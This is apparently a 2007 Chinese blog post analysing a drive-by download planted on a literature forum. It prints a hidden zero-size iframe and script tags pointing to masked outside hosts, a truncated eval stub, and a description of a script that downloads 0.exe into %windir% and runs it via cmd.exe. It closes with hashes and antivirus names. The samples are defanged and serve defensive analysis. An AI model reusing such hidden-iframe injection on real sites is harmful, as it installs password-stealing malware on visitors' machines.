文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe

文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe

endurer 原创
2007-08-31 第1版

检查发现网页中包含代码：
/---
＜iframe src="hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907" width="0" height="0" frameborder="0"＞＜/iframe＞
---/

hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907 包含代码：
/---
＜script src=hxxp://www.y*oyo*5*9***.com/00.js＞＜/script＞
1
2
3
＜script src=hxxp://www.y*oyo*5*9***.com/11.js＞＜/script＞
---/

00.js　内容为：
/---
eval("/146/165…（略）…/40/175")
---/

解密后的代码功能为 下载 hxxp://www.*down*8**9.com/0.exe，保存到 %windir%，文件名由自定义函数：
/---
ｆｕｎｃｔｉｏn ｇn（tnＶ1） ｛ ｖａｒ ｋＵｚＲo2 ＝ ｗinｄow［"Ｍatｈ"］["randoｍ"]()＊tnV1; rｅturn '．tmｐ'＋'～tmp'; ｝
---/
生成，即~tmp.tmp，然后用 cmd.exe /c 来运行。

文件说明符 : d:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-31 19:3:13
修改时间 : 2007-8-31 19:3:22
访问时间 : 2007-8-31 0:0:0
大小 : 16944 字节 16.560 KB
MD5 : ceb6f4d04c9f5ff2f6636dd7233460d9
HSA1: 9F48898ECA47463712D65752C4AF0C072F200C8F

Kaspersky 报为 Worm.Win32.QQPass.a，瑞星 报为 Trojan.PSW.Win32.Agent.vcd

11.js 没有什么可疑的东东。